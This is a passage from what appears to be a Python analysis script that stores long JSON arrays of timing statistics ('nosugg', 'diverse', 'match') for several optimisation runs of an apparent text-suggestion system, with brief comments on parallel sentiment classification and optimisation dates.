275,285,385,371,282,514,220,666,671,669,464,514,516,519,372,374,338,192,189,285,401,401,459,463,207,178,280,336,440,582,217,254,348,333,335,191,389,343,383,439,320,433,533,535,533,582,317,465,470,333,434,498,646,694,786,300,282,199,392,494,234,342,295,338,209,403,502,502,385,240,373,511,518,416,518,234,473,477,267,366,383,434,363,267,268,367,379,263,272,69,223,384,481,485,422,422,520,272,363,423,516,520,233,368,371,268,470,485,257,271,326,85,340,341,341,394,161,319,418,219,230,390,392,495,285,96,399,494,469,518,286,334,219,353,314,301,452,160,257,285,286,223,316,233,332,136,384,385,441,566,566,663,667,223,391,391,279,326,425,196,192,342,492,213,325,326,424,373,609,273,524,625,623,210,345,427,320,288,485,584,202,391,198,387,486,224,419,418,512,614,665,186,587,589,593,788,212,296,445,204,205,336,136,504,503,603,603,209,19,369,207,187,317,366,187,412,417,616,114,114,49,169,267,465,466,562,209,153,215,195,366,369,371,205,134,339,340,311,314,285,292,383,485,499,189,384,436,200,224,225,228,319,347,231,293,70,269,272,80,111,114,208,413,511,202,129,219,179,413,473,195,195,335,336,139,140,251,133,228,69,252,351,386,461,464,197,263,263,98,183,426,315,315,189,124,710,809,873,880,361,501,268,346,96,176,254,132,152,346,264,365,236,348,70,101,330,342,190,159,372,288,286,368,100,358,93,274,339,425,512,140,254,264,290,365,367,161,356,168,966,968,972,288,186,427,231,329,198,262,306,396,480,579,583,308,368,205,198,249,206,265,359,207,266,103,123,320,419,470,514,594,217,759,807,968,359,972,458,419,409,338,414,429,290,247,479,290,181,409,96,347,409,281,330,278,377,292,293,307,351,268,229,347,54,87,663,674,291,373,20,266,27,325,425,22,23,6,323,364,307,450,447,250,45,67,328,328,222,332,327,373,413,125,221,157,314,316,490,563,565,286,313,273,356,121,227,347,261,266,192,310]} ''' #%% # Lots of samples with # - parallel sentiment classification, chunksize=32 # - printing disabled stats = ''' 
{"numInflight":0,"nosugg":[44,64,74,33,62,120,28,46,47,64,27,61,260,36,60,31,51,93,63,83,55,85,50,30,58,62,30,145,102,30,138,87,33,54,227,146,61,66,50,53,47,84,123,87,54,99,40,85,135,80,77,68,106,94,275,146,242,38,81,340,36,80,37,82,73,58,111,66,112,62,110,28,50,58,147,30,55,28,78,30,51,39,57,86,122,95,131,29,47,130,26,62,33,51,146,42,28,58,83,29,47,27,52,29,47,108,26,42,121,121,29,63,29,48,89,159,29,47,31,51,43,58,40,60,41,48,53,113,73,128,111,199,83,293,141,4,4,2,2,3,25,61,58,28,67,47,74,31,56,40,70,46,63,211,73,33,53,45,85,26,24,52,34,63,27,44,70,51,65,47,98,46,64,51,53,113,81,77,45,83,183,179,104,99,107,64,67,104,75,81,230,79,82,183,529,78,122,52,95,77,73,70,51,61,77,23,64,80,63,71,37,83,53,50,221,69,52,230,65,48,88,193,279,237,195,176,49,4,41,37,42,4,188,73,69,66,37,143,85,63,59,214,199,67,112,59,65,54,83,40,85,84,93,65,67,81,126,101,76,78,135,177,31],"diverse":[370,433,160,470,241,232,364,162,308,236,393,189,168,268,451,155,398,359,376,203,158,280,233,141,304,240,153,144,285,122,121,258,432,88,172,9,8,141,140,151,150,7,161,173,456,224,155,296,141,278,132,282,55,286,227,400,96,236,322,175,317,149,284,270,322,153,287,45,168,255,271,430,266,126,254,189,279,151,209,268,48,47,143,273,6,34,156,369,104,232,132,177,163,66,109,160,151,290,291,162,166,266,303,167,330,372,178,294,342,141,176,255,280,422,423,131,129,140,233,28,25,91,236,108,32,63,263,403,40,128,212,184,274,233,140,285,263,98,228,173,459,18,17,34,53,249,281,279,360,241,175,219,147,298,449,181,225,35,171,170,313,146,278,142,272,408,343,156,462,538,468,114,210,102,158,148,274,35,292,363,171,75,324,371,291,659,156,298,169,315,127,271,360,149,285,177,141,263,268,537,260,326,133,256,252,153,287,125,200,136,260,186,424,138,156,382,162,275,168,143,368,155,285,133,373,140,282,257,261,369,243,471,51,151,214,161,303,155,379,155,143,399,160,182,404,119,63,67,135,139,459,141,138,174,319,171,169,208,163,233,304,249,292,195,62,105,138,183,220,84,223,45,80,245,739,743,310,355,182,274,142,294,231,272,59,204,238,281,344,437,140,205,306,394,273,175,126,295,409,210,200,302,296,250,132,257,269,491,83,183,109,129,41,177,122,244,164,416,261,115,165,104,240,170,323,278,475,206,193,342,258,302,93,230,590,617,334,262,307,181,185,128,183,162,311,504,341,162,161,200,198,254,337,381,793,403,532,184,217,171,314,450,56,61,328,288,333,310,372,256,145,333,106,444,233,41,149,164,346,124,259,361,416,219,349,296,444,585,197,247,155,398,380,202,202,151,184,140,183,204,283,70,67,47,59,141,286,152,189,159,154,146,142,22,161,282,322,309,355,287,325,130,289,7,6],"match":[144,491,374,327,355,312,499,667,364,311,145,274,12,8,6,124,165,141,270,71,122,380,127,236,360,257,137,275,467,169,147,287,154,143,284,53,150,118,242,118,251,171,299,283,128,262,123,289,148,313,98,131,278,141,272,358,334,547,176,148,178,147,270,142,280,143,396,266,261,406,34,147,132,267,146,302,147,276,249,191,491,260,241,202,382,144,156,293,203,141,184,239,195,301,661,426,173,299,159,301,233,148,291,249,197,398,128,298,300,245,269,391,244,275,319,133,190,366,152,299,172,299,164,298,183,299,250,557,464,156,315,238,409,257,289,221,567,541,350,431,165,142,295,153,393,248,97,131,236,140,280,172,297,64,77,123,170,151,275,153,155,294,178,124,266,114,161,143,479,225,39,172,38,55,126,261,275,137,65,15,289,286,426,119,232,35,52,142,267,128,261,47,165,140,115,272,234,157,274,142,271,142,244,278,191,246,280,152,285,115,241,176,304,141,256,135,163,385,201,125,260,239,189,139,348,145,137,275,144,175,303,141,366,253,257,212,418,474,147,112,146,134,223,142,287,118,177,48,79,139,272,133,262,152,131,328,51,176,126,250,2
75,183,547,292,177,302,46,74,127,267,4,4,4,4,3,31,68,134,262,112,168,340,340,386,223,191,196,225,256,126,263,330,218,262,244,251,196,248,109,162,254,192,189,175,174,319,196,423,180,181,267,312,332,146,191,139,486,382,348,57,190,174,272,52,88,146,233,317,158,251,259,304,486,447,531,332,272,310,196,151,284,203,139,332,60,125,265,202,247,118,293,150,399,221,233,289,96,140,251,198,147,175,346,344,79,124,195,375,181,362,166,211,52,97,391,364,200,486,114,245,177,288,261,427,238,316,280,324,230,273,378,313,268,275,114,282,146,290,68,113,150,400,259,245,234,314,171,306,227,307,222,277,239,244,385,260,266,285,290,259,415,653,390,367,243,238,319,172,309,186,472,207,175,318,237,282,111,158,291,177,315,164,108,182,188,143,283,144,259,145,286,154,128,273,48,72,292,588,519,789,261,391,143,153,257,386,168,138,193,147,190,179,295,13,154,294,128,256,38,176,128,245,149,280,32,55,216,202,352,129,381,169,131,367,141,288,152,295,42,176,130,382,207,143,279,135,231,143,294,127,235,158,136,252,364,177,139,52,115,135,255,317,431,50,68,24,149,275,221,269,592,319,254,217,385,150,122,297,132,260,144,273,149,384,125,215,355,204,179,156,308,144,369,378,127,299,201,140,442,411,194,244,277,550,177,162,294,154,272,366,327,312,130,228,149,291,108,237,256,247,274,99,137,144,299,157,201,55,82,141,310,6,31,37,62,7,39,125,233,156,47,155,293,194,345,247,357,122,133,260,37,160,128,247,139,267,68,27,100,131,384,242,231,388,239,122,163,230,42,81,172,95,296,116,230,237,27,53,43,65,34,61,53,138,475,331,33,158,156,278,144,311,259,361,149,276,96,24,139,139,365,34,72,128,263,75,151,286,306,151,138,269,146,261,185,331,254,173,156,165,147,175,147,373,220,274,232,189,441,131,260,136,270,130,258,320,353,310,148,274,241,293,256,291,91,231,277,158,521,219,274,210,295,135,286,151,295,283,298,294,618,249,290,635,585,360,157,297,143,380,274,170,315,203,156,354,337,196,173,216,296,282,277,427,22,156,190,187,209,277,357,274,276,418,213,278,601,582,682,68,107,219,232,420,159,147,293,67,112,196,240,237,149,284,152,219,301,172,168,110,154,182,136,280,250,287,375,312,499,722,343,297,329,142,249,185,183,142,385,239,98,97,226,280,356,174,155,278,240,344,288,389,232,302,272,399,158,303,304,166,263,164,209,296,303,657,420,156,226,72,215,241,273,420,141,404,60,83,167,227,52,74,145,272,145,319,160,283,143,239,208,380,53,203,43,160,57,82,137,122,282,155,150,155,280,172,306,397,130,267,5,38,64,137,267,138,375,225,28,56,166,253,392,110,221,372,242,218,542,177,7,36,138,286,141,140,277,136,293,159,246,46,186,159,324,99,229,165,140,273,160,114,262,142,269,128,276,172,310,120,260,152,169,298,135,277,191,226,36,165,42,121,233,132,254,255,35,179,34,170,198,195,175,273,257,175,420,218,218,121,304,142,221,314,242,328,316,310,407,276,72,118,259,124,121,150,359,313,159,612,488,705,323,96,100,255,296,249,294,264,309,387,348,432,260,305,295,481,477,315,242,265,267,216,300,143,190,173,328,299,837,750,699,781,693,300,284,333,540,501,589,179,180,76,222,164,411,153,138,228,188,146,285,167,311,212,255,157,133,307,247,338,178,159,299,173,356,154,287,149,407,175,83,163,164,551,324,221,196,323,50,203,200,144,196,206,254,258,398,243,423,197,53,83,65,61,179,325,247,395,482,147,384,217,310,142,289,162,206,44,40,148,435,220,220,200,350,190,621,217,316,332,159,404,150,340,53,332,288,44,79,180,173,356,227,390,443,689,242,300,365,488,62,201,68,164,184,619,497,322,198,50,195,191,329,424,392,573,230,313,165,404,318,180,368,147,286,56,157,302,250,296,241,429,206,224,310,143,286,175,219,175,225,6,56,252,541,414,409,454,323,369,140,169,195,444,252,339,476,207,183,375,163,303,42,195,153,296,2
01,157,210,250,295,186,276,228,263,20,58,281,311,420,501,146,291,138,283,179,328,285,317,493,560,161,405,170,6,141,11,9,211,303,165,309,45,223,265,369,29,28,176,322,167,177,324,116,164,129,211,234,273,161,255,210,361,308,55,63,185,162,224,60,105,186,325,237,299,101,194,313,367]} ''' #%% # Optimized. stats = ''' {"numInflight":0,"nosugg":[319,159,19,40,47,111,26,42,24,37,22,43,62,80,21,46,226,121,27,59,29,40,22,32,99,30,24,37,38,34,56,69,34,49,21,26,32,49,56,58,76,199,132,20,36,111,26,38,59,65,40,25,41,32,45,65,66,27,43,59,98,20,31,32,21,39,98,30,41,91,108,49,75,59,33,62,30,53,198,55,21,33,22,36,26,43,41,55,22,34,184,82,216,89,25,36,77,119,20,32,21,47,109,21,32,21,53,21,34,33,49,34,91,70,67,50,47,106,102,42,83,109,116,112,64,60,51,49,71,68,165,48,61,51,4,2,3,2,3,3,17,30,141,534,73,97,20,32,34,51,30,59,33,20,45,28,40,43,89,29,43,22,29,47,37,53,53,21,33,21,59,53,35,47,20,30,46,38,159,88,84,64,60,74,69,69,65,72,69,100,80,49,59,38,67,73,45,42,64,67,48,44,40,3,47,43,47,68,63,64,39,84,70,68,67,112,66,73,80,39,138,68,63,57,57,84,81,73,71,54,30,74,42,113,2,2,22,17,21,37,19,31,21,34,4,37,34,26,101,22,47,39,34,24,42,51,66,77,28,59,49,18,41,19,36,98,25,60,23,32,43,21,57,15,27,92,56,22,70,60,75,127,43,63,62,109,60,35,128,33,41,36,38,65,61,65,62,54,76,71,23,52,112,60,104,134,51,47,48,45,70,67,69,78,51,47,40,39,101,128,39,50,78,75,54,138,386,65,61,46,89,91,53,50,50,180,176,75,64,83,84,182,77,75,83,79,65,61,78,75,61,57,39,86,74,69,52,91,44,89,95,62,65,61,57,83,84,78,73,74,117,41,37,63,43,44,60,54,47,70,90,71,71,51,91,85,86,114,118,119,288,26,49,50,47,89,92,47,49,50,159,79,47,95,104,63,41,212,212,34,36,49,48,43,43,56,56,41,57,57,231,185,56,62,163,200,78,170,72,72,17,87,38,128,6,16,15,97,4,72,177,43,37,116,143,146,121,38,28,53,28,28,55,36,47],"diverse":[207,303,174,352,96,201,104,232,119,233,130,225,110,340,129,106,149,105,221,144,257,128,226,34,225,208,149,127,332,262,422,113,205,6,129,50,12,66,275,281,289,241,140,5,4,5,115,259,192,124,278,111,239,147,352,26,128,115,219,125,224,118,223,320,675,104,155,67,122,69,91,208,134,116,218,154,150,102,307,208,148,108,137,110,450,121,227,105,204,195,183,120,292,60,100,7,44,44,6,33,79,209,65,30,69,268,225,68,81,68,115,227,147,353,237,213,398,195,265,167,348,127,230,31,147,242,4,137,135,126,234,13,125,239,18,17,125,239,40,140,76,302,383,107,202,135,167,127,129,209,110,210,191,297,55,244,115,143,249,116,209,87,7,6,178,6,4,280,95,172,83,239,113,213,262,438,111,55,354,126,240,246,6,117,145,649,95,199,119,275,139,61,192,275,322,111,442,115,326,105,128,239,64,170,289,200,189,299,119,222,115,278,101,202,7,7,136,283,102,202,221,305,106,228,107,127,325,125,196,160,345,133,252,100,96,239,225,124,327,108,251,166,28,77,127,269,620,141,200,61,84,44,80,41,66,64,90,141,236,49,123,225,176,135,267,229,158,273,142,184,130,268,212,238,272,112,208,148,278,382,127,209,152,196,229,413,201,187,231,177,173,287,143,150,219,60,69,126,126,220,116,221,116,211,124,337,145,186,107,211,618,722,101,215,248,173,166,104,192,170,370,116,136,137,45,173,40,61,186,318,115,233,255,133,328,106,202,45,152,120,225,93,145,193,116,105,293,119,214,112,80,177,134,108,357,119,209,68,213,43,50,77,306,112,245,334,172,325,121,259,114,152,258,313,51,48,104,232,115,245,233,95,196,133,233,80,85,122,150,39,40,35,214,257,46,99,61,145,37,82,140,243,167,63,69,175,120,152,75,263,149,103,196,101,123,169,128,167,250,597,162,120,234,203,223,110,220,119,212,130,253,99,210,233,101,100,119,119,6,116,100,155,275,158,119,250,118,217,120,365,245,40,77,122,269,128,283,84,110,158,484,120,198,46,134,104,203,99,204,138,381,218,142,281,130
,347,148,125,216,92,325,135,110,151,253,101,195,106,99,184,91,257,197,105,211,156,79,144,134,148,331,171,213,246,231,276,260,258,147,63,97,230,275,104,197,167,149,485,346,251,198,244,119,260,201,173,318,185,246,278,103,203,7,39,184,181,211,137,228,38,133,96,195,241,53,59,155,214,255,189,234,233,279,148,241,203,353,24,23,107,289,109,83,82,114,220,150,95,182,217,134,289,325,43,52,181,104,151,110,20,202,105,61,111,9,119,96,214,146,166,63,13,94,114,72,85,93,135,134,11,225,268,237,122,190,147,129,114,208,44,6,30,26,10,231,237,149,183,190,218,133,211,135,96,195,195,299,132,40,100,27,196,236,46,159,185,130,181,113,32,73,24,89,131,104,186,235,204,86,65,68,233,173,148,211,29,430,134,158,111,7,6],"match":[95,193,191,104,384,330,350,100,222,100,191,118,205,96,191,104,200,103,181,98,212,96,177,103,278,155,98,190,176,184,135,215,390,138,120,186,39,105,234,120,221,125,216,139,139,249,204,115,255,283,129,263,113,133,237,8,96,117,241,56,102,205,170,131,100,115,123,228,246,107,219,143,265,356,331,216,112,229,113,233,105,202,199,124,196,128,51,125,239,65,107,117,220,102,205,41,63,115,211,100,209,272,268,151,66,260,111,228,114,348,423,162,326,468,127,166,146,278,51,171,196,127,221,109,216,142,348,147,271,110,229,12,235,226,509,257,290,106,275,143,254,130,330,196,101,216,130,71,262,250,240,123,231,70,191,193,117,209,242,224,335,306,360,147,283,132,243,231,90,200,98,132,255,336,100,222,201,312,109,193,112,239,96,212,141,127,214,141,254,99,199,185,325,86,101,250,98,130,222,201,263,48,69,95,127,115,330,268,97,200,28,41,24,109,99,209,282,232,161,111,211,116,217,108,226,335,321,331,326,46,51,6,5,17,16,92,191,113,214,7,84,103,105,227,136,189,304,117,226,101,210,114,214,102,202,103,42,204,96,196,118,161,80,115,96,194,123,262,113,226,132,228,42,54,107,217,101,143,113,199,151,298,132,238,31,61,151,162,288,108,312,219,25,53,71,27,214,243,252,74,185,168,366,144,277,130,263,144,255,113,230,285,262,393,485,140,176,109,211,118,141,128,246,149,274,113,217,117,240,350,114,159,143,132,278,103,210,108,298,206,123,234,190,143,160,44,382,131,300,178,372,199,209,345,199,164,353,603,26,138,104,192,341,221,118,229,143,137,134,254,129,239,51,133,162,177,156,292,132,251,45,60,93,227,109,172,34,68,113,222,27,122,31,70,41,117,253,36,59,207,134,244,342,287,330,122,241,29,104,29,60,96,198,75,92,285,160,102,205,95,71,175,26,112,101,266,170,185,327,484,270,446,98,187,129,225,102,193,146,300,157,102,197,290,189,104,142,102,208,103,126,230,163,263,126,240,129,224,128,90,191,159,113,227,135,149,122,257,102,180,124,172,304,422,456,134,224,28,160,175,109,220,129,173,177,228,282,47,194,123,276,120,85,239,123,214,144,250,101,28,162,97,221,143,363,263,227,315,631,442,258,141,259,253,329,401,593,159,107,297,174,117,138,28,47,104,199,116,240,156,190,323,320,258,124,24,57,119,266,342,136,246,166,153,300,576,804,42,52,133,236,203,95,325,241,100,36,112,133,220,100,213,125,285,215,56,254,343,250,231,100,192,113,202,110,221,123,175,76,194,156,290,110,133,137,244,212,484,127,336,172,133,250,244,234,364,176,22,42,47,141,136,161,115,216,156,256,114,213,97,188,59,197,21,165,261,238,379,144,98,283,183,53,79,114,292,220,134,101,216,106,444,328,240,30,48,256,113,212,221,328,255,475,110,205,102,266,118,213,99,189,117,139,119,213,104,216,135,251,192,76,101,42,61,102,114,259,140,191,87,117,222,125,222,26,46,15,39,124,325,262,101,214,196,362,416,513,217,125,186,88,211,145,273,333,64,172,96,171,104,198,336,158,276,28,124,104,237,113,231,114,213,97,251,156,151,284,127,237,56,273,132,331,349,170,124,301,118,214,148,38,245,127,256,100,202,125,231,126,216,330,131,224,63,
107,104,70,92,103,104,198,85,180,83,79,105,127,220,201,214,261,226,270,100,218,259,152,90,185,224,219,152,295,51,96,226,236,330,323,152,446,345,293,169,269,163,264,239,357,191,409,214,269,166,269,121,58,154,181,239,225,318,335,275,333,472,184,247,115,159,207,253,91,233,214,301,128,317,194,107,128,132,148,36,127,32,131,250,98,121,137,271,219,67,43,172,173,291,208,164,305,169,209,39,185,125,110,310,182,151,114,224,142,253,142,131,253,112,285,28,216,172,149,289,152,38,242,186,130,237,141,266,101,138,105,214,307,168,199,25,53,181,266,145,281,102,231,113,97,204,72,128,95,270,84,104,200,186,302,336,444,96,63,207,109,203,99,242,260,38,120,125,231,104,198,119,267,36,211,173,140,234,55,159,232,53,79,125,254,120,153,195,250,221,108,237,145,235,93,138,267,28,26,46,65,161,130,260,109,97,258,98,233,178,114,220,54,66,31,139,104,211,132,228,39,126,276,120,129,122,222,208,227,351,360,219,184,164,338,344,116,216,175,294,96,290,150,372,466,124,168,52,255,157,199,188,234,191,142,245,148,27,115,131,129,146,239,240,168,197,99,276,109,207,116,173,238,284,112,114,131,169,105,203,178,272,124,196,323,257,85,82,115,216,143,134,184,137,279,193,238,140,342,165,134,271,146,276,186,232,55,52,188,381,208,184,119,164,133,189,236,91,184,105,250,133,157,240,188,233,132,129,101,198,180,277,81,62,200,80,125,106,212,114,246,104,302,105,239,70,65,162,307,147,219,252,111,159,51,197,227,272,93,139,194,290,162,300,317,387,138,223,183,282,109,314,175,139,165,223,98,194,188,232,104,206,99,293,193,99,289,229,246,476,343,145,294,245,229,276,110,265,109,234,170,172,297,105,202,161,45,66,98,158,197,332,25,43,56,75,105,202,105,133,246,28,151,81,176,296,136,161,6,25,96,208,114,219,42,41,68,118,215,113,140,107,316,209,137,232,20,128,96,197,53,170,105,41,59,271,310,229,143,362,99,290,168,128,223,36,200,176,353,122,270,117,227,291,200,307,123,223,110,156,296,134,232,116,218,88,192,131,256,47,95,188,122,193,313,343,115,374,170,127,376,257,193,101,202,99,334,202,243,260,101,187,22,122,103,219,19,134,237,147,284,133,232,118,251,99,256,355,101,184,26,145,130,100,194,6,4,58,75,30,102,231,160,229,7,24,79,116,217,43,42,166,311,21,60,101,202,121,172,325,409,96,189,113,204,130,130,222,147,105,203,189,234,104,300,194,137,338,151,205,248,247,44,88,205,188,234,109,206,118,212,88,142,59,59,223,259,110,206,38,38,150,195,125,112,220,222,268,183,123,89,260,203,249,159,203,109,206,118,212,170,261,72,70,176,267,120,261,123,142,139,127,322,341,242,390,232,276,130,274,167,312,187,277,107,152,152,54,160,196,241,104,297,208,230,106,184,87,124,168,164,141,216,261,175,229,181,416,375,244,223,172,317,250,301,117,213,220,264,150,182,151,252,206,175,118,254,86,119,169,64,162,157,202,130,268,315,291,361,227,226,259,106,241,78,59,55,62,58,214,106,226,84,214,110,217,109,237,136,227,188,225,169,169,205,303,323,179,128,191,68,121,223,226,75,79,151,200,199,106,114,106,267,194,225,195,107,83,168,182,202,115,260,187,203,209,115,255,294,50,237,267,184,23,21,179,229,197,230,433,165,129,287]} ''' #%% # optimized 2017-06-14 stats = ''' 
{"numInflight":0,"nosugg":[187,22,51,25,35,31,46,112,62,19,58,59,18,40,54,149,36,44,46,77,59,212,19,29,32,54,103,47,122,19,35,27,35,197,41,13,29,26,46,72,35,86,36,53,55,25,55,30,64,169,598,73,41,51,19,55,19,40,46,65,17,28,17,28,21,65,211,25,17,26,37,40,25,76,25,42,20,34,50,65,18,31,33,82,68,38,54,58,20,34,18,31,54,18,37,19,37,22,37,40,67,41,60,43,54,18,47,21,33,22,37,51,20,37,87,21,33,32,36,84,29,40,212,32,42,20,35,21,34,37,53,44,37,13,10,3,3,2,3,3,42,55,20,54,59,33,64,29,45,4,38,67,25,110,36,48,35,21,50,28,43,25,24,39,65,5,27,134,109,35,60,40,51,76,33,106,39,76,50,114,48,53,133,162,28,34,23,38,21,45,110,22,56,35,22,61,12,7,21,36,16,31,20,17,7,21,26,57,33,45,3,35,46,20,34,30,40,22,50,22,47,57,68,29,53,44,33,42,21,40,33,30,66,21,30,23,36,20,30,22,39,51,27,39,40,37,66,37,31,42,38,35,44,58,78,24,43,18,33,63,19,43,34,37,18,47,26,61,36,52,24,49,73,84,19,30,20,50,36,27,56,56,55,20,32,32,45,21,17,4,2,17,30,39,56,58,110,34,47,24,48,17,28,21,34,31,51,21,42,28,41,20,32,49,25,39,14,23,16,33,45,188,46,45,37,51,29,45,21,53,30,31,43,19,43,18,33,19,31,25,38,37,34,21,35,50,36,51,122,19,29,20,47,82,41,53,71,63,74,19,38,24,52,21,34,21,31,31,47,21,33,19,32,81,37,50,44,59,37,66,42,27,42,57,17,29,25,112,169,4,22,38,23,41,29,48,43,21,39,53,38,53,35,41,33,27,43,18,28,39,75,24,42,68,20,35,33,47,37,29,55,28,42,51,47,87,38,50,21,36,49,70,30,70,117,32,70,33,55,35,40,17,40,41,19,32,20,47,38,51,34,53,22,62,17,33,40,39,61,22,42,71,40,64,18,30,61,43,126,28,42,21,66,5,20,17,30,42,15,31,40,36,116,30,44,24,52,18,38,43,41,52,68,22,36,20,31,98,31,47,50,45,41,19,49,18,35,24,58,33,51,51,64,25,3,3,2,3,2,18,30,23,56,46,110,30,55,17,37,31,46,20,32,19,33,20,37,30,42,55,26,41,24,23,44,44,21,18,24,40,29,41,31,32,33,46,33,52,34,44,39,50,129,143,35,50,111,22,40,37,145,27,43,59,83,77,45,67,46,26,40,19,29,55,21,49,3,23,55,46,25,84,14,24,25,37,32,48,22,39,22,55,38,20,32,39,59,24,37,22,54,28,57,27,40,26,51,25,38,27,67,24,35,27,38,40,57,32,58,23,42,30,23,37,22,19,21,37,28,38,40,48,27,48,35,39,25,44,27,41,53,34,50,62,97,38,33,26,52,38,22,35,25,40,29,40,20,31,31,49,24,36,62,18,49,30,48,23,57,17,47,111,31,45,13,27,20,45,25,39,127,47,59,31,62,35,47,23,45,33,46,46,65,130,21,52,19,34,15,25,81,79,79,20,41,41,39,25,54,41,44,19,32,100,28,77,20,31,41,37,3,2,19,39,117,31,42,26,37,19,40,94,20,41,34,47,32,20,52,24,53,90,19,50,34,32,56,30,80,22,42,21,45,18,32,25,20,48,21,52,36,55,36,48,33,43,29,44,18,30,78,29,48,27,26,50,44,56,74,33,20,31,48,64,21,46,95,25,41,73,22,38,63,36,21,32,64,78,37,52,27,38,4,3,2,19,59,27,46,29,49,17,30,20,41,22,42,42,60,34,84,33,60,36,21,59,27,57,30,43,42,38,19,38,127,21,53,56,21,46,34,37,37,44,58,22,36,27,39,20,31,44,52,38,39,34,45,23,42,34,61,54,40,52,48,75,22,47,48,46,19,30,17,29,39,30,43,19,39,39,38,36,59,22,37,21,35,73,117,115,19,35,33,45,36,90,27,28,41,75,27,52,26,46,46,26,39,31,68,38,72,88,22,34,35,51,29,39,47,104,30,55,115,98,14,30,27,39,20,34,18,29,22,37,23,49,18,29,20,47,28,43,34,36,26,45,30,46,49,21,47,62,21,51,31,53,74,91,20,56,59,129,75,35,50,61,110,81,137,46,77,41,22,49,113,38,52,46,76,20,15,37,50,37,53,22,42,125,40,39,66,39,61,30,47,22,34,21,38,59,50,61,33,55,28,48,31,62,23,43,19,33,22,36,20,48,18,32,31,44,20,37,38,47,40,68,29,53,65,33,65,28,61,25,35,20,75,18,41,47,77,102,35,50,46,46,26,35,57,34,47,56,68,122,35,109,83,76,52,21,36,16,47,25,37,24,63,35,50,37,38,20,39,21,34,23,44,20,33,20,40,20,38,19,33,33,51,28,34,45,34,47,139,29,48,21,54,33,43,42,69,20,29,22,33,36,52,19,33,22,33,15,27,57,28,42,32,57,50,74,406,54,40,69,18,38,40,59,20,34,22,34,24,55,23,54,28,30,46,62,20,43,39,41,21,108,23,42,82,81,26,46,18,30,27,40,60
,35,49,21,56,44,23,60,27,38,28,47,26,43,50,73,27,40,30,43,24,35,57,42,28,44,18,32,21,41,62,22,34,18,47,39,38,61,33,19,46,37,38,54,27,39,50,22,41,31,20,60,66,21,36,30,52,81,57,24,21,40,19,30,43,96,39,43,42,43,41,21,32,46,57,52,48,20,50,39,47,36,29,45,27,38,37,50,20,37,25,37,23,38,23,56,5,3,27,25,38,47,20,49,11,23,37,50,68,19,40,16,27,25,39,20,45,26,49,38,51,38,35,21,33,18,14,29,39,25,41,19,35,18,32,24,37,42,65,21,36,4,25,39,39,35,41,5,81,49,39,58,29,48,48,31,23,99,74,26,39,83,59,77,25,40,23,39,35,50,35,50,39,54,33,43,20,42,34,53,29,53,72,241,28,45,22,39,30,38,56,36,49,33,65,21,37,38,18,39,35,52,27,47,21,40,19,31,30,30,42,21,35,49,23,42,21,25,37,34,48,29,39,20,46,35,37,37,47,46,45,22,34,38,43,35,118,142,20,31,41,37,36,40,52,23,42,21,54,23,35,40,61,35,41,21,49,24,35,22,33,3,33,46,20,31,26,56,97,21,50,20,46,46,71,71,33,47,30,44,26,28,39,25,42,40,57,29,43,68,31,28,56,25,38,23,53,19,37,36,35,64,38,50,51,50,40,216,98,24,56,25,40,41,57,31,41,21,33,101,25,41,21,40,30,49,16,29,25,82,33,61,22,43,104,20,34,38,66,37,30,62,31,31,68,27,46,33,46,39,59,19,64,38,18,27,32,45,26,44,84,43,46,47,133,54,28,49,33,46,27,42,40,36,35,49,29,45,40,63,29,38,65,22,35,24,36,21,41,40,28,44,58,5,33,55,31,47,21,57,30,43,21,33,51,20,36,19,37,52,26,20,35,48,62,56,70,21,38,30,41,44,48,19,32,20,31,41,59,18,45,35,47,40,37,40,27,22,34,26,49,35,34,26,54,19,36,123,19,43,57,56,121,21,37,20,36,21,33,32,30,20,33,23,36,25,38,29,42,23,44,3,3,3,3,38,102,22,41,19,51,33,46,30,37,28,40,18,39,34,55,40,41,29,41,5,53,61,49,39,30,61,22,19,50,63,26,43,39,21,43,26,53,74,113,46,23,37,43,21,44,20,41,61,78,19,34,24,47,20,35,24,38,104,26,64,31,52,28,27,61,84,78,31,29,58,73,28,46,46,165,75,52,24,37,25,37,19,46,163,53,43,48,35,38,36,42,51,54,41,51,59,31,43,31,43,34,51,39,54,22,42,15,31,51,43,57,22,36,19,31,22,41,21,39,19,40,40,66,79,39,30,60,30,51,36,18,21,35,36,17,53,19,23,36,71,41,42,34,45,36,53,87,89,22,56,24,37,27,25,39,34,78,25,58,25,47,47,31,47,23,34,39,139,53,24,56,30,49,40,31,44,36,56,63,37,36,48,27,24,75,125,25,27,40,23,35,40,66,44,44,35,37,71,34,129,22,36,20,37,126,24,40,30,79,32,48,89,76,18,38,65,69,19,32,21,35,72,38,19,44,58,65,52,65,37,115,59,58,41,53,19,35,56,34,44,166,51,21,37,26,39,50,64,22,41,28,32,29,21,51,19,16,24,52,21,33,56,23,48,22,38,95,30,21,57,23,34,29,44,32,44,24,33,49,18,32,45,59,21,42,22,33,25,41,38,51,24,40,64,21,35,23,37,30,49,45,56,36,59,61,27,44,46,111,37,47,31,43,23,39,36,39,21,50,21,42,25,40,46,24,40,31,49,18,35,21,32,110,26,44,36,52,32,43,31,24,56,33,58,121,94,41,52,35,49,32,47,30,46,31,49,22,54,33,38,35,23,44,20,38,35,49,49,25,21,40,37,50,27,52,39,51,38,49,30,44,31,103,21,51,27,38,24,41,21,18,24,56,109,5,4,25,38,55,97,40,32,78,66,20,36,23,35,34,31,3,2,2,3,2,2,3,2,2,2,20,49,40,59,50,56,45,37,70,35,86,24,69,34,50,41,67,47,40,101,21,42,20,35,27,39,23,41,23,35,28,45,189,29,37,30,47,26,49,65,25,41,49,97,26,36,21,39,25,42,33,42,36,54,25,40,44,91,30,54,25,41,25,31,50,21,57,32,58,24,45,78,22,50,20,32,43,40,29,46,37,51,54,27,33,52,18,28,44,67,34,42,95,27,29,37,26,48,26,39,20,32,58,21,31,25,49,54,23,34,34,44,19,46,23,35,130,136,36,70,20,38,35,17,31,22,36,23,41,45,66,35,72,36,122,118,26,52,22,59,28,58,26,47,40,109,64,40,37,57,58,139,37,52,54,73,20,41,89,132,37,21,37],"diverse":[240,329,97,216,94,204,125,189,101,139,110,217,213,122,246,268,140,132,235,181,94,116,96,199,140,139,105,240,143,22,134,33,271,215,611,225,122,233,107,229,116,268,124,130,85,84,75,114,203,247,50,132,262,132,213,25,64,88,252,226,348,145,5,221,469,181,169,132,263,198,347,163,327,328,286,129,133,287,128,52,147,85,256,166,278,159,159,310,216,308,158,149,136,30
